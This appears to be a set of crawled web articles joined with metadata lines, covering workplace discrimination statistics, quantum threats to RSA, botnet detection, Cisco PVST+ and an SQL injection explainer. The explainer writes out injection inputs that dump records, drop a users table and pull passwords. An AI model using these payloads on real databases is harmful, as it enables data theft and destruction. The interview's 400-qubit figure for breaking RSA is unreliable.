Transgender people are often victims of workplace discrimination, as they are among the most vulnerable groups.
1. 4 out of 10 women in the United States confirm they have faced discrimination at a certain point in their career because of their gender.
(Pew Research Center)
Statistics on discrimination in the workplace point out that 42% of working women in the US have experienced some type of discrimination at work because of their gender. Sometimes it is pay discrimination (they earn less than men despite doing the same job); other times they aren't given a chance for promotion or are passed over for important assignments. By comparison, 22% of men have experienced at least one of eight forms of gender discrimination at work.
2. Discrimination in the workplace statistics shows that EEOC has received more than 50,000 pregnancy discrimination claims in the last decade.
Women make up nearly 50% of the US workforce, and more than 85% of them will become mothers during their careers. It is alarming that pregnancy discrimination continues to limit their opportunities for advancement. On top of that, one of the most disturbing discrimination facts is that many employers say it is necessary to ask if a woman has young children during the hiring process.
3. Pay discrimination data confirm that 48 US states have enforced equal pay laws for employees of all genders to improve female discrimination in the workplace statistics.
Although all employers have to follow federal laws regarding pay discrimination in the workplace, specific state laws can vary significantly depending on the region. For example, Alabama and Mississippi haven’t enforced laws yet, and Georgia’s law affects only businesses with 10 or more employees. Despite this, discrimination reports show that the situation with workplace discrimination and harassment hasn’t changed much.
4. Transgender discrimination statistics show that nearly 25% of the 90% of transgender workers who reported workplace discrimination were told to use bathrooms not matching their gender identity.
Transgender people are also under the protection of the Title VII of the Civil Rights Act of 1964. Despite this, they have reported several mistreatment issues, like prejudice in the workplace, harassment by coworkers, missed promotion opportunities, and have even experienced physical violence and sexual assault.
5. Statistics about discrimination show that 74% of Black men have experienced discrimination in the workplace.
(Pew Research Center)
Moreover, 14% of them have experienced workplace discrimination and racism regularly, while 60% have experienced it occasionally. Among Black women, 9% reported regularly experiencing racial discrimination, while 59% were discriminated against once in a while. Discrimination is more common among Black workers with at least some college education: 81% have experienced it at least occasionally, and 13% experience it regularly.
Racial Discrimination in the Workplace Statistics
Racism in the workplace can be an uncomfortable subject for many. Even though 93% of white employees don't think racial intolerance and discrimination exist in their workplace, it has happened to their colleagues. Here are some statistics that will give you a better idea of how often racism is a severe workplace issue, and for whom.
6. Employment statistics by race reveal that 75% of Black people were discriminated against in the workplace.
Moreover, 61% of Hispanic and 42% of White workers experienced discrimination at work. On top of that, discrimination data shows that Black and Hispanic employees get paid less than White workers, regardless of their education level. In 2019, Black employees with advanced degrees earned 82.4% of what White workers with advanced degrees were paid.
7. 42% of employees in the US have witnessed or experienced racism in the workplace.
For some individuals, racial harassment in the workplace is a daily occurrence. Workplace stress statistics show that situations like these can increase the risk of anxiety, depression, and post-traumatic stress disorder. Moreover, they can seriously damage a person's self-esteem and overall well-being.
8. Employment discrimination statistics show that 25% of Black job applicants receive callbacks for whitened resumes.
(Harvard Business School)
Many people of color feel the need to whiten their resumes, which means changing their names and modifying or erasing work experiences that might hint at their minority status.

In a recent hiring discrimination survey, only 10% of Black applicants received callbacks for resumes that included ethnic details, compared with 25% for whitened resumes. Among Asian applicants, 21% received callbacks for whitened resumes, whereas only 11.5% received callbacks for their unaltered resumes.
9. In 2020, ethnic minorities had an unemployment rate of 12.9%.
(Equality and Human Rights Commission)
Moreover, work discrimination facts show that White people had an unemployment rate of only 6.3%. Black employees with a degree earned approximately 23.1% less than White people, while Black workers who left school with A-levels were typically paid 14.3% less than their White colleagues.

These are alarming facts. No matter how hard they try, ethnic minorities can't reach the employment levels and pay grades of White workers, which is understandably discouraging.
Religious Discrimination in the Workplace Statistics
Title VII also protects individuals from being discriminated against based on their religious views. Additionally, it protects employees or applicants from discrimination and harassment if they don’t belong to any religious group and proclaim themselves as atheists.
Recent employment discrimination cases show that religious discrimination also includes treating employees or applicants differently because their spouse or partner follows a particular religion, or because of their own connection with a religious group.
10. Muslims and atheists are more likely to be discriminated against in the US.
(University of Washington)
The US is a culturally diverse society, much more so today than in the past, and the rate of change is fast. Workplace discrimination statistics show Muslims often suffer prejudice at work, whether because of the hijab some women wear or because of unfounded associations between Islam and terrorism.

Atheists are often discriminated against because they don't belong to a religious group, especially if most of their colleagues, or their boss, do.
11. 82% of Muslims are subject to some discrimination.
(Pew Research Center)
Furthermore, occupational discrimination stats show that 63% of US adults say that being a Muslim may hurt someone’s chances for advancement at the workplace or in American society in general, while 31% say it can hurt their chances a lot.
12. US citizens believe that Muslims are two times more likely to be discriminated against and harassed at work than atheists, Jewish, and Mormons.
EEOC complaint statistics show that Muslims, Jews, and Mormons have faced much discrimination at work. Many got dismissed because of their religion. Others weren’t hired or given a chance to be promoted. Some even claim that they have received a lower wage because of their religious beliefs.
13. In 56 countries in the world, women get frequently harassed at work because of their religious clothing style.
(Pew Research Center)
Despite equal opportunity laws and advanced degrees, ethnic minority women, and those with a specific religious dress code, are often subject to discrimination and harassment in the workplace. Furthermore, job discrimination statistics show they remain under-represented and disadvantaged, and often miss out on leadership positions.
14. The average settlement amount for EEOC claims on religious discrimination is around $40,000–$50,000.
(California Labor Law)
When a case of discrimination is prolonged, the employee may file a lawsuit to seek justice. Seeking justice is an essential and worthy pursuit for people who have suffered in the workplace. However, to improve their chances of winning a discrimination lawsuit, they need evidence and documentation to support their claim.
Weight and Disability Discrimination in the Workplace Statistics
Research shows that weight and disability discrimination have a very negative impact on the targeted employees’ lives. However, there are still many harassment and employment discrimination cases based on weight and disability. Let’s take a look at some statistics concerning the category mentioned above.
15. 93% of employers would rather hire a person who doesn’t appear overweight.
Weight discrimination in the workplace statistics shows that many employers wouldn’t hire an obese person or someone who appears to be overweight. Despite the negative effect weight discrimination can have on the lives of affected people, in some countries it is legal to discriminate against someone based on their weight.
16. Disabled employees earn about $9,000 less per year than non-disabled employees.
Over 60% of people with disabilities are of legal working age. However, they experience a much higher unemployment rate than non-disabled employees.
17. Disability discrimination accounts for 33.4% of filed employee discrimination cases.

EEOC lawsuit statistics show that this translates to 24,238 cases. Federal law is meant to reduce discrimination against employees with disabilities, yet disability-related complaints still make up a third of all workplace discrimination claims.
18. 26 US states have seen improvements in hiring people with disabilities.
Arizona has seen the most significant job gains in the past couple of years. In fact, more than 17,000 people with disabilities have joined the state’s economy. On the other hand, California saw the most significant losses, with up to 21,000 employees with disabilities losing their jobs.
Age Discrimination in the Workplace Statistics
Age discrimination is illegal, and workers are protected by federal law. All employees, regardless of their age, should receive fair and equal wages and benefits. It is against the law to lay off older employees, replace them with younger ones, or pay them a lower wage.

It is also illegal to deny a promotion opportunity to someone simply because they are a few years from retirement. Let's look at some statistics.
19. 31% of Hispanic employees younger than 40 have experienced discrimination in the workplace.
Among Hispanic employees older than 40, the figure rises to 70%. Furthermore, 83% of Hispanic workers who have experienced age discrimination say it is widespread. Many of those who haven't reported age discrimination say they are afraid of losing their jobs if they do.
20. Age discrimination facts reveal that 36% of US residents feel that their age prevents them from finding a job.
According to the EEOC, age remains one of the top drivers of discrimination. People often hear they are either too young or too old for the job, and some are denied promotions because they are close to retirement.
21. Approximately 21% of employees have experienced discrimination in the workplace because of their age.
One in five workers complains of having experienced age discrimination in the workplace. At the same time, a quarter of workers fear losing their jobs once they reach 40.
Wrapping Up the Workplace Discrimination Statistics
It is illegal for employers to treat someone poorly and unfairly because of their age, gender identity, disability, pregnancy, race, religion or belief, or sexual orientation. One survey showed that many people between 18 and 34 feel uncomfortable around LGBTQ people. What's frightening is that these are young people, who should be less biased than older generations. Sadly, LGBT workplace discrimination statistics show that our society still has work to do in accepting that all people are different.
Mistreated and harassed employees should not be afraid to step up and make a claim against discrimination.
It is crucial that such incidents are called out and addressed before they happen to somebody else. If you feel you have been discriminated against or mistreated at work, or know anybody in a similar situation, make sure you file a complaint and help them stand up for themselves.
People Also Ask
What is an example of unfair discrimination?
Unfair discrimination is one of the most common forms of discrimination in the workplace. It happens when a person is treated differently from other people in the workplace. For example, when a woman doesn’t get offered a promotion at work because she is pregnant and will take maternity leave soon, it is considered discrimination.
Unfair discrimination is usually associated with age, disability, sexual and religious orientation, status as a parent, national origin, race, color, and gender. Such unpleasant situations usually occur while people are at school, work, or in a public place (such as a shopping mall, subway station, and similar).
What are the most common discrimination offenses?
The most common discrimination offenses at the office may include job refusal, denial of new training opportunities, transfers, and promotions due to gender, age, parental status, or sexual orientation. In some situations, people get unfairly dismissed, have their shifts cut down, and are excluded or ignored by coworkers.
Workplace discrimination is also when the management hands employees impossible tasks. They can also hide information from certain employees so that they can’t deliver their best performance.
How do you prove discrimination at work?
When an unpleasant discrimination situation happens at work, simply reporting discrimination in the workplace to your manager is not enough. It is necessary to have evidence to prove it. First of all, the discriminated person must check if their problem is considered unfair discrimination.
Evidence can take several forms. For example, it includes testimony in the form of a statement taken from a witness who saw what happened. Materials, such as evaluations, handwritten notes by an employer, letters, emails, and memos can also be considered evidence.
How much is the average discrimination lawsuit?
The average settlement amount for EEOC claims on employment discrimination is around $40,000–$50,000. Most of these cases get settled out of court, but some go to trial.
What constitutes disability discrimination?
Workplace discrimination due to disability means that somebody is being treated differently because of their disability, perceived disability, or association with a disabled person. Treating a person differently because of their disability, no matter if it is visible, can be against the law and therefore punishable.
Categories of discrimination based on physical or mental disabilities are: harassing an employee, avoiding recruiting or firing them because of their disability, not giving them a promotion, or prohibiting them from further improving themselves by doing extra training.
Is victimization a type of discrimination?
According to the Equality and Human Rights Commission, victimization is defined as an act of discrimination when a person gets badly treated because they have done a ‘protected act’. This includes making a complaint about discrimination and helping another person make it by providing evidence or information.
An example of victimization is when a boss shouts at an employee because they support another employee’s discrimination claim. According to workplace discrimination statistics, 22% of employees complain about workplace victimization each week. | <urn:uuid:10500557-9589-4d9d-b8cf-287747403976> | CC-MAIN-2022-40 | https://safeatlast.co/blog/workplace-discrimination-statistics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.964053 | 3,466 | 3.0625 | 3 |
Quantum Computing: Sizing Up the Risks to Security
How Advanced Computing Could Threaten the Effectiveness of Encryption
Within the next five to 10 years, quantum computing will get so powerful that it could be used to break encryption on the fly, predicts Steve Marshall, CISO at U.K.-based Bytes Software Services.
"We rely on cryptography to prevent people from decoding our credit cards and to protect highly sensitive data that we share. Quantum computing is going to have a major influence on all of these things," Marshall says in an interview with Information Security Media Group.
"At the moment, quantum computers have about 72 qubits of quantum information. ... In order to crack things like RSA 2048 public key cryptography, you require about 400 qubits of power. So it's only a matter of time before quantum computers get to the point where they have got enough power in order to be able to crack RSA and other asymmetric cryptography."
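The reason quantum computers threaten RSA in particular is that an RSA private key can be recovered by anyone who can factor the public modulus, and Shor's algorithm would let a sufficiently large quantum computer do that efficiently. As a toy illustration of why factoring equals key recovery (classical trial division on the standard textbook modulus, not real key material):

```python
def factor(n: int) -> tuple[int, int]:
    """Recover p and q by trial division -- feasible only for toy moduli."""
    d = 2
    while d * d <= n:
        if n % d == 0:
            return d, n // d
        d += 1
    raise ValueError("n is prime")

# Textbook RSA: modulus n = 61 * 53, public exponent e = 17.
n, e = 3233, 17
p, q = factor(n)                    # instant here; hopeless for a 2048-bit n
d = pow(e, -1, (p - 1) * (q - 1))   # private exponent follows from p and q
print(p, q, d)  # 53 61 2753
```

Every known classical algorithm makes this step infeasible for 2048-bit moduli; Shor's algorithm removes that guarantee, which is why post-quantum schemes rely on different hard problems.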
In this interview, Marshall also discusses:
- Categories of post-quantum cryptography;
- The state of research on quantum-resistant cryptography;
- How quantum computing impacts information security.
Marshall, who is based in the U.K., is CISO at Bytes Software Services, a computer support and services firm. He specializes in business consulting, payments, compliance, breach clean-up, enterprise architecture validation, assurance, corporate/information security, security restructures and risk across many business verticals and markets. | <urn:uuid:39b534aa-a09f-4ed6-95cc-3010bdd4a23c> | CC-MAIN-2022-40 | https://www.healthcareinfosecurity.com/interviews/quantum-computing-sizing-up-risks-to-security-i-4222 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.903987 | 306 | 2.515625 | 3 |
Malware authors have always updated their software and evolved their techniques to take advantage of new technologies and bypass security measures.
Botnets are a perfect example of how cyber criminals have managed to accomplish that over the past decade. Their widespread and severe consequences have transformed botnets into one of the most significant and destructive threats in the cyber security landscape, as they are responsible for many large-scale and high-profile attacks.
Examples of attacks performed by botnets include distributed denial of service (DDoS), personal or classified data theft, spam campaigns, cryptocurrency mining and fake news spreading on social media platforms.
Moreover, there is an exponential increase in attacks that result from crime-as-a-service offerings, which usually include botnets that are rented or sold to people or groups lacking experience or technical skills who wish to perform nefarious activities. So, it is clear that taking security measures against botnets is crucial for an organisation’s well-being and the protection of private data.
The growing threat of botnets
One way to categorise botnets is by the technology they adopt for their command and control (C&C) mechanism. In terms of C&C, the architecture of a botnet can be either centralised (see Figure 1) or decentralised (see Figure 2).
In the first category, the bots communicate with one or more servers using the client-server model. The first generation of centralised botnets used internet relay chat (IRC) channels to communicate with the C&C server. However, due to the single-point-of-failure nature of centralised architectures, criminals started developing botnets based on peer-to-peer (P2P) communications, overcoming the problem of the previous generation of botnets.
Indeed, P2P botnets, with their resilience and robustness, posed an even greater threat to organisations, but they have two major drawbacks. First, they are difficult to maintain because of the complexity of their development and deployment. Second, since there is no longer a central C&C server, the herder might not have full control of the botnet any more.
The solution adopted by malware authors was to return to the centralised architecture model. However, they did not use the IRC protocol for the communications between the herder and the bots; the HTTP protocol was used instead. The advantage and strength of this solution is that the HTTP protocol is commonly used by legitimate, non-malicious web applications and services.
So, the attackers are able to embed their traffic in non-malicious, legitimate HTTP traffic and hide C&C commands among normal network activities. This gives HTTP-based botnets their great advantage, which is their ability to stay “under the radar” and perform their nefarious operations undetected.
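Even when C&C commands ride inside ordinary-looking HTTP, their timing can betray them: bots tend to poll their server at near-regular intervals, while human-driven browsing is bursty. A minimal sketch of this common beaconing heuristic (the 0.1 coefficient-of-variation cut-off and the timestamps are illustrative assumptions, not production values):

```python
from statistics import mean, stdev

def looks_like_beacon(timestamps, max_cv=0.1):
    """Flag near-periodic request timing (low jitter) as beacon-like."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2:
        return False  # too few requests to judge periodicity
    cv = stdev(gaps) / mean(gaps)  # coefficient of variation of the gaps
    return cv < max_cv

bot   = [0, 60.2, 119.8, 180.1, 240.0, 299.9]  # polls C&C every ~60 s
human = [0, 2.1, 2.9, 45.0, 46.2, 300.5]       # bursty, irregular browsing
print(looks_like_beacon(bot), looks_like_beacon(human))  # True False
```

Real detectors combine timing with many other flow characteristics, but the principle is the same: behaviour, not payload content, gives the bot away.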
Botnet detection techniques
Many researchers have dedicated their efforts to the study and analysis of HTTP botnets and finding accurate ways to detect them. A large number of researchers approach the problem by employing behaviour-based detection techniques, since the traditional signature-based systems are often easily bypassed by new generations of malware.
More specifically, the analysis of network traffic and its characteristics (not necessarily the packets’ payload) can provide very insightful information as to whether a network flow or packet is benign or if it is part of a botnet’s C&C mechanism, even in cases where traffic is encrypted. Examples of traffic characteristics that could prove useful are the flow duration, the total number of packets exchanged in a flow, the length of the packet in a flow and the median of payload bytes per packet.
Machine learning plays a key role in this approach, as behaviour-based botnet detection systems are usually built using a classification model that is trained on a dataset with specified features (a set of network characteristics in our case). This classification model is able to identify efficiently and accurately malware-generated traffic when certain behaviour patterns are met.
Apart from classification, more machine learning tools (feature extraction, for example) could be used to make our system as accurate and fast as possible. In general, novel attacks deployed by newer or more advanced versions of existing malware can be prevented using this approach, as this detection system is not based on malware signatures.
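A behaviour-based detector of the kind just described is, at bottom, a classifier over flow-feature vectors such as those listed above. A deliberately simplified sketch using a nearest-centroid rule over invented training flows (production systems use richer features and stronger models):

```python
def centroid(rows):
    """Per-feature mean of a list of feature vectors."""
    return [sum(col) / len(rows) for col in zip(*rows)]

def classify(flow, centroids):
    """Label a flow by its nearest class centroid (squared Euclidean)."""
    def dist(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    return min(centroids, key=lambda label: dist(flow, centroids[label]))

# Feature vectors: [flow duration (s), packets per flow, median payload bytes]
benign_flows = [[12.0, 40, 900], [30.0, 120, 1200], [8.0, 25, 700]]
cnc_flows    = [[300.0, 6, 90], [290.0, 5, 110], [310.0, 7, 80]]

centroids = {"benign": centroid(benign_flows), "c&c": centroid(cnc_flows)}
print(classify([295.0, 6, 100], centroids))  # c&c
print(classify([10.0, 30, 800], centroids))  # benign
```

Because the decision depends only on traffic behaviour, a long-lived, sparse, small-payload flow is flagged even if its payload is encrypted or its malware signature is unknown.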
Cyber attackers adapt
Unsurprisingly, attackers started looking for ways and techniques that would allow them to overcome detection systems’ progress and bypass behaviour-based detection. Adversarial machine learning is an emerging technique that, among others, could target and evade security systems that utilise machine learning for dealing with malicious activities.
Typically, its functionality is based on taking advantage of a classifier's weaknesses. For example, there might be a space of instances (flows or packets, say) that the classifier cannot describe well, so instances that belong to that space will be misclassified.
Another kind of attack that can be performed against systems based on machine learning is when adversaries attack the training phase of classification; that is, they try to inject adversarial training data into the classification model. This eventually leads to a model that incorrectly labels malicious instances as non-malicious, thus increasing the number of false negatives and leaving the system vulnerable.
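To make the poisoning attack concrete, here is a toy one-feature detector (all numbers invented) that learns a payload-size cut-off separating beacon traffic from normal traffic. Injecting beacon-sized flows mislabelled as benign drags the learned threshold down until a genuine C&C flow evades detection as a false negative:

```python
def train_threshold(benign_sizes, malicious_sizes):
    """Learn a midpoint cut-off between the two classes' mean payload sizes."""
    mean_b = sum(benign_sizes) / len(benign_sizes)
    mean_m = sum(malicious_sizes) / len(malicious_sizes)
    return (mean_b + mean_m) / 2

# Median payload bytes per packet: C&C beacons are tiny, normal traffic larger.
benign, malicious = [900, 1100, 1000], [80, 120, 100]
clean = train_threshold(benign, malicious)                              # 550.0
# Poisoning: beacon-sized flows mislabelled as benign in the training set.
poisoned = train_threshold(benign + [90, 110, 100, 95] * 3, malicious)  # 189.5

probe = 300  # a genuine C&C flow; "malicious" means payload below the cut-off
print(probe < clean, probe < poisoned)  # True False -- now a false negative
```

Real poisoning attacks target far more complex models, but the mechanism is identical: corrupted training labels shift the decision boundary in the attacker's favour.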
Obfuscation techniques used by attackers should also be taken into consideration when implementing detection systems based on behaviour. More specifically, attackers might attempt to convert the value of certain attributes and characteristics of network traffic flows that are indicative of malicious activity, into values that are typical and normal for non-malicious flows, thereby evading security measures. Therefore, if the obfuscated features are used by the classification system, the malicious flows will have a greater chance of bypassing the detection system.
Keep an eye on trending threats
To conclude, a best practice for organisations in terms of security is to always be up-to-date with the current trends in the cyber threat landscape as it is a field that changes constantly and radically.
Machine learning has proven to be an extremely powerful ally in the battle against certain kinds of malware, and it currently seems to be the ideal method for keeping up with the evolution of threats, both in terms of detection accuracy and efficiency.
Of course, behaviour-based systems have the drawback of false positives, but the benefits of this approach more than outweigh that disadvantage.
However, when employing behaviour-based systems, organisations should not overlook the complexity and difficulty of building such systems and the caveats that come with this solution, some of them mentioned above – adversarial machine learning, obfuscation of features.
Technical expertise, along with patience and the ability to gain insight, are probably the most important values professionals and organisations should be equipped with to successfully deploy and manage such complex systems that will help them adjust to today’s threat landscape and continue operating in a secure environment. | <urn:uuid:5d95d5a4-ec7d-4ae9-9549-bb293d0e15d6> | CC-MAIN-2022-40 | https://www.computerweekly.com/microscope/opinion/Botnets-and-machine-learning-A-story-of-hide-and-seek | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00087.warc.gz | en | 0.952904 | 1,404 | 3.515625 | 4 |
Per-VLAN Spanning Tree
One of the things that must be considered with VLANs is the function of the Spanning Tree Protocol (STP). STP is designed to prevent loops in a switch/bridged topology to eliminate the endless propagation of broadcast around the loop. With VLANs, there are multiple broadcast domains to be considered. Because each broadcast domain is like a unique bridged internetwork, you must consider how STP will operate.
The 802.1Q standard defines one unique Spanning Tree instance to be used by all VLANs in the network. STP runs on the Native VLAN so that it can communicate with both 802.1Q and non-802.1Q compatible switches. This single instance of STP is often referred to as 802.1Q Mono Spanning Tree or Common Spanning Tree (CST). A single spanning tree lacks flexibility in how the links are used in the network topology. Cisco implements a protocol known as Per-VLAN Spanning Tree Plus (PVST+) that is compatible with 802.1Q CST but allows a separate spanning tree to be constructed for each VLAN. There is only one active path for each spanning tree; however, in a Cisco network, the active path can be different for each VLAN.
The term Mono Spanning Tree is typically not used anymore because the IEEE 802.1s standard has now defined a Multiple Spanning Tree (MST) protocol that uses the same acronym.
Because a trunk link carries traffic for more than one broadcast domain and switches are typically connected together via trunk links, it is possible to define multiple Spanning Tree topologies for a given network. With PVST+, a root bridge and STP topology can be defined for each VLAN. This is accomplished by exchanging BPDUs for each VLAN operating on the switches. By configuring a different root or port cost based on VLANs, switches could utilize all the links to pass traffic without creating a bridge loop. Using PVST+, administrators can use ISL or 802.1Q to maintain redundant links and load balance traffic between parallel links using the Spanning Tree Protocol. Figure 3-15 shows an example of load balancing using PVST+.
Figure 3-15 PVST Load Balancing
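The load balancing shown in Figure 3-15 is usually achieved by making each distribution switch the preferred root bridge for a different group of VLANs. A sketch in Cisco IOS (switch names and VLAN numbers are hypothetical):

```
! Switch-A: preferred root for VLAN 10, backup root for VLAN 20
Switch-A(config)# spanning-tree vlan 10 root primary
Switch-A(config)# spanning-tree vlan 20 root secondary

! Switch-B: the mirror image, so each parallel link forwards for one VLAN
Switch-B(config)# spanning-tree vlan 20 root primary
Switch-B(config)# spanning-tree vlan 10 root secondary
```

With this arrangement, VLAN 10 traffic forwards over the link toward Switch-A and VLAN 20 traffic over the link toward Switch-B, while each per-VLAN spanning tree still blocks its own redundant path.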
Cisco developed PVST+ to allow running several STP instances, even over an 802.1Q network, by using a tunneling mechanism. PVST+ allows Cisco devices to connect a Mono Spanning Tree zone (typically another vendor's 802.1Q-based network) to a PVST+ zone (typically a Cisco ISL-based network). No specific configuration is needed to achieve this. PVST+ provides support for 802.1Q trunks and the mapping of multiple spanning trees to the single spanning tree of standard 802.1Q switches running Mono Spanning Tree.
The PVST+ architecture distinguishes three types of regions:
A PVST region (PVST switches using ISL only)
A PVST+ region (PVST+ using ISL and/or 802.1Q between Cisco switches)
A Mono Spanning Tree region (Common or Mono Spanning Tree using 802.1Q and exchanging BPDUs on the Native VLAN only between a Cisco and Non-Cisco switches using 802.1Q)
Each region consists of a homogenous type of switch. You can connect a PVST region to a PVST+ region using ISL ports. You can also connect a PVST+ region to a Mono Spanning Tree region using 802.1Q ports.
At the boundary between a PVST region and a PVST+ region, the mapping of Spanning Tree is one-to-one. At the boundary between a Mono Spanning Tree region and a PVST+ region, the Spanning Tree in the Mono Spanning Tree region maps to one PVST in the PVST+ region. The one it maps to is the CST. The CST is the PVST of the Native VLAN (VLAN 1 by default).
On an 802.1Q trunk, BPDUs can be sent or received only by the Native VLAN. Using PVST+, Cisco switches can send their PVST BPDUs as tagged frames using a Cisco multicast address as the destination. When a non-Cisco switch receives the multicast, it is flooded (but not interpreted as a BPDU, thus maintaining the integrity of CST). Because it is flooded, it will eventually reach Cisco switches on the other side of the CST domain. This allows the PVST frames to be tunneled through the Mono Spanning Tree region. Tunneling means that the BPDUs are flooded through the Mono Spanning Tree region along the single spanning tree present in that region.
PVST+ networks must be in a tree-like structure for proper STP operation. | <urn:uuid:d2b0db2c-ca33-4b54-96e9-8623248dcdb5> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=102157&seqNum=4 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00087.warc.gz | en | 0.889318 | 1,006 | 2.8125 | 3 |
What is SQL injection
SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.
The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLi, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent targets.
What are SQL queries
SQL is a standardized language used to access and manipulate databases to build customizable data views for each user. SQL queries are used to execute commands, such as data retrieval, updates, and record removal. Different SQL elements implement these tasks, e.g., queries using the SELECT statement to retrieve data, based on user-provided parameters.
A typical eStore’s SQL database query may look like the following:
SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = ItemNumber
From this, the web application builds a string query that is sent to the database as a single SQL statement:
sql_query= " SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = " & Request.QueryString("ItemID")
A user-provided input http://www.estore.com/items/items.asp?itemid=999 can then generate the following SQL query:
SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = 999
As you can gather from the syntax, this query provides the name and description for item number 999.
Types of SQL Injections
SQL injections typically fall under three categories: In-band SQLi (Classic), Inferential SQLi (Blind) and Out-of-band SQLi. You can classify SQL injections types based on the methods they use to access backend data and their damage potential.
In-band SQLi (Classic SQLi)

The attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQLi's simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:
- Error-based SQLi—the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
- Union-based SQLi—this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
Inferential (Blind) SQLi
The attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band.
Blind SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. Blind SQL injections can be classified as follows:
- Boolean—the attacker sends a SQL query to the database, prompting the application to return a result that varies depending on whether the query is true or false. Based on the result, the information within the HTTP response changes or stays unchanged, so the attacker can work out whether the query generated a true or false result.
- Time-based—attacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, an HTTP response will be generated instantly or after a waiting period. The attacker can thus work out if the message they used returned true or false, without relying on data from the database.
Out-of-band SQLi

The attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques.
Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed. These techniques count on the capacity of the server to create DNS or HTTP requests to transfer data to an attacker.
SQL injection example
An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.
For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1.
As a result, the corresponding SQL query looks like this:
SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = 999 OR 1=1
And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those that you may not be eligible to access.
Attackers are also able to take advantage of incorrectly filtered characters to alter SQL commands, including using a semicolon to separate two fields.
For example, this input http://www.estore.com/items/items.asp?itemid=999; DROP TABLE Users would generate the following SQL query:
SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = 999; DROP TABLE USERS
As a result, the entire user database could be deleted.
Another way SQL queries can be manipulated is with a UNION SELECT statement. This combines two unrelated SELECT queries to retrieve data from different database tables.
For example, the input http://www.estore.com/items/items.asp?itemid=999 UNION SELECT username, password FROM USERS produces the following SQL query:
SELECT ItemName, ItemDescription FROM Items WHERE ItemID = '999' UNION SELECT Username, Password FROM Users;
Using the UNION SELECT statement, this query combines the request for item 999’s name and description with another that pulls names and passwords for every user in the database.
SQL injection combined with OS Command Execution: The Accellion Attack
Accellion is the maker of File Transfer Appliance (FTA), a network device widely deployed in organizations around the world and used to move large, sensitive files. The product is over 20 years old and is now at end of life.
FTA was the subject of a unique, highly sophisticated attack combining SQL injection with operating system command execution. Experts speculate the Accellion attack was carried out by hackers with connections to the financial crimes group FIN11, and ransomware group Clop.
The attack demonstrates that SQL injection is not just an attack that affects web applications or web services, but can also be used to compromise back-end systems and exfiltrate data.
Who was affected by the attack?
The Accellion exploit is a supply chain attack, affecting numerous organizations that had deployed the FTA device. These included the Reserve Bank of New Zealand, the State of Washington, the Australian Securities and Investments Commission, telecommunication giant Singtel, and security software maker Qualys, as well as numerous others.
Accellion attack flow
According to a report commissioned by Accellion, the combination SQLi and command execution attack worked as follows:
- Attackers performed SQL Injection to gain access to document_root.html, and retrieved encryption keys from the Accellion FTA database.
- Attackers used the keys to generate valid tokens, and used these tokens to gain access to additional files
- Attackers exploited an operating system command execution flaw in the sftp_account_edit.php file, allowing them to execute their own commands
- Attackers created a web shell in the server path /home/seos/courier/oauth.api
- Using this web shell, they uploaded a custom, full-featured web shell to disk, which included highly customized tooling for exfiltration of data from the Accellion system. The researchers named this shell DEWMODE.
- Using DEWMODE, the attackers extracted a list of available files from a MySQL database on the Accellion FTA system, and listed files and their metadata on an HTML page
- The attackers performed file download requests, which contained requests to the DEWMODE component, with encrypted and encoded URL parameters.
- DEWMODE is able to accept these requests and then delete the download requests from the FTA web logs.
This raises the profile of SQL injection attacks, showing how they can be used as a gateway for a much more damaging attack on critical corporate infrastructure.
SQLI prevention and mitigation
There are several effective ways to prevent SQLI attacks from taking place, as well as protecting against them, should they occur.
The first step is input validation (a.k.a. sanitization), which is the practice of writing code that can identify illegitimate user inputs.
While input validation should always be considered best practice, it is rarely a foolproof solution. The reality is that, in most cases, it is simply not feasible to map out all legal and illegal inputs—at least not without causing a large number of false positives, which interfere with user experience and an application’s functionality.
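At the code level, the strongest complement to validation is to keep user input out of the SQL text altogether with parameterized queries, so the database engine receives it strictly as data. A minimal illustration using Python's built-in sqlite3 module (the table and the hostile input mirror the eStore example above):

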